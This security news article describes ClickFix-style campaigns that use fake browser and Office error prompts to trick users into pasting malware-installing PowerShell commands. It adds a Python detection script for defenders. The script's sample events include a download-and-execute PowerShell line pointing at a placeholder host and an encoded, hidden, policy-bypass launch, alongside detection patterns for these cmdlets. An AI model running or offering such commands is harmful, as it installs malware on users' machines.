Hackers Using Fake Chrome, Word, and OneDrive to Target Users

admin


  • Hackers are using fake Google Chrome, Microsoft Word, and OneDrive to install payloads across devices.
  • This trick is being used by multiple threat actors who are sending fake error messages over these apps and tricking users into downloading malware.
  • The worst part is Windows is still not able to detect or block these attacks. So until then, the danger persists.


Hackers around the world are constantly coming up with new ways to trick users, and this time they have created fake Google Chrome, Microsoft Word, and OneDrive error messages. The worst part is this is not a single operation – multiple threat actors have been found using this trick.

  • For instance, TA571, the threat actor who is known for sending out bulk emails to trick users into downloading malware, was found using this method.
  • Similarly, threat actors behind ClearFake and a new attack cluster called ClickFix were also found to be a part of this malicious operation.

How Exactly Does It Work?

According to a report by Proofpoint, the payloads used in these attacks are NetSupport, Matanbuchus, Amadey Loader, DarkGate, XMRig, a clipboard hijacker, and Lumma Stealer.

Now speaking of the methodology, there are three ways in which these attacks are being carried out.

Method #1 – ClickFix Campaign

The first case is associated with the ‘ClickFix’ campaign.

  • Here, the threat actors send an error message to users through email or as website overlays and then convince them to download their browser’s latest update.
  • However, the link leads to fake updates which are then used to install malware onto a user’s device.

In some cases, the users are also asked to open “Windows PowerShell (Admin)” and paste a certain code provided by them. The end result is the same here as well.

Method #2 – Root Certificate

In the second case, the hackers sent a warning to the users, saying that there was some trouble displaying the webpage and they needed to install a “root certificate”.

To do this, the users were directed to copy a PowerShell script into the Windows Clipboard and run it in a Windows Admin console. This script would then display fake messages while silently downloading malware on the device that would steal their information.

Method #3 – Fake Email

In the third method, threat actors send emails that look like Microsoft Word document prompts and ask users to download something called “Word Online” – an extension that will apparently help the users view their documents correctly.

The error message also contained options like “How to fix” and “Auto-fix”, each of which supplies certain commands that can apparently fix the error (whatever error has been displayed to the user) if pasted into PowerShell. In reality, doing so will open up your system to malware.
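All three methods end the same way: the victim is talked into pasting a command into a PowerShell window opened from the Start menu, the Run dialog, or a browser page. That gives defenders a common detection point, because the resulting process-creation event shows PowerShell launched by an interactive parent (explorer.exe or a browser) with command-line switches that legitimate administration rarely needs. The following Python script is an added example written for this article, not code from Proofpoint or from the report; it scans a handful of constructed, Sysmon-style process-creation records (JSON lines with assumed field names `Image`, `ParentImage`, `CommandLine`, `User`) and scores each PowerShell launch on the parent process and on indicators such as encoded commands, hidden windows, execution-policy bypass, and download-and-run cmdlets. The sample events and the URL in them are constructed for the demonstration.

```python
"""Triage process-creation events for paste-and-run PowerShell abuse (ClickFix-style).

Added example, not part of the original article. Event field names follow Sysmon's
Event ID 1 schema (Image, ParentImage, CommandLine, User) but the events themselves
are constructed for this demonstration.
"""
from __future__ import annotations

import json
import re

# Parents from which a user-pasted command would be launched: the Start menu / Run
# dialog (explorer.exe) or a browser that rendered the fake error overlay.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line indicators that detection rules commonly key on. Each regex is
# case-insensitive because PowerShell switches and cmdlets are.
INDICATORS = {
    "encoded_command": re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "policy_bypass": re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass"),
    "web_download": re.compile(
        r"(?i)\b(?:invoke-webrequest|iwr|downloadstring|downloadfile|invoke-restmethod|irm)\b"
    ),
    "invoke_expression": re.compile(r"(?i)\b(?:invoke-expression|iex)\b"),
    "clipboard_read": re.compile(r"(?i)\bget-clipboard\b"),
}

# Constructed sample events (JSON lines). The encoded blob and URL are placeholders.
SAMPLE_EVENTS = r"""
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -w hidden -ep bypass -enc QQBBAEEAQQA=", "User": "DESKTOP\\alice"}
{"Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "pwsh.exe -NoProfile -File C:\\Scripts\\nightly-backup.ps1", "User": "NT AUTHORITY\\SYSTEM"}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "CommandLine": "powershell.exe -NoP -c \"iwr https://example.invalid/fix.ps1 | iex\"", "User": "DESKTOP\\bob"}
{"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe /c dir", "User": "DESKTOP\\alice"}
"""


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(event: dict) -> list[str]:
    """Return the indicator names that fire for one process-creation event.

    Non-PowerShell processes return an empty list. 'interactive_parent' is placed
    first when the launching process is a shell or browser the user was sitting in.
    """
    if basename(event.get("Image", "")) not in POWERSHELL_IMAGES:
        return []
    cmdline = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    if basename(event.get("ParentImage", "")) in INTERACTIVE_PARENTS:
        hits.insert(0, "interactive_parent")
    return hits


def severity(hits: list[str]) -> str:
    """Map fired indicators to a triage level.

    An interactive parent plus any command-line indicator is the ClickFix shape and
    rates 'high'; several indicators from a non-interactive parent still deserve a
    look ('medium'); a single indicator alone is 'low'.
    """
    cmd_hits = [h for h in hits if h != "interactive_parent"]
    if "interactive_parent" in hits and cmd_hits:
        return "high"
    if len(cmd_hits) >= 2:
        return "medium"
    if cmd_hits:
        return "low"
    return "none"


def scan(jsonl: str) -> list[dict]:
    """Parse JSON-lines events and return one finding per event that scored above 'none'."""
    findings = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        hits = analyse_event(event)
        level = severity(hits)
        if level == "none":
            continue
        findings.append({
            "user": event.get("User", "?"),
            "parent": basename(event.get("ParentImage", "")),
            "severity": level,
            "indicators": hits,
            "command": event.get("CommandLine", ""),
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['user']} parent={f['parent']} indicators={f['indicators']}")
        print(f"        {f['command']}")
```

Running the script flags the two constructed PowerShell launches that came from explorer.exe and chrome.exe, and ignores the scheduled backup and the plain cmd.exe launch. In a real deployment the same logic would run over Sysmon Event ID 1 or Windows Security Event ID 4688 (with command-line auditing enabled), and pairing it with PowerShell Script Block Logging (Event ID 4104) captures the decoded content of any `-EncodedCommand` payload for the analyst.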

How Effective Are These Tricks?

The biggest problem with these tricks is that Windows is still unable to detect and block them. So until then, users will constantly be vulnerable.

Also, although the attack methods require a great deal of social engineering, they are carried out so cleverly that users actually believe there’s something wrong with their system that needs to be fixed. So in simple terms, they are pretty effective.
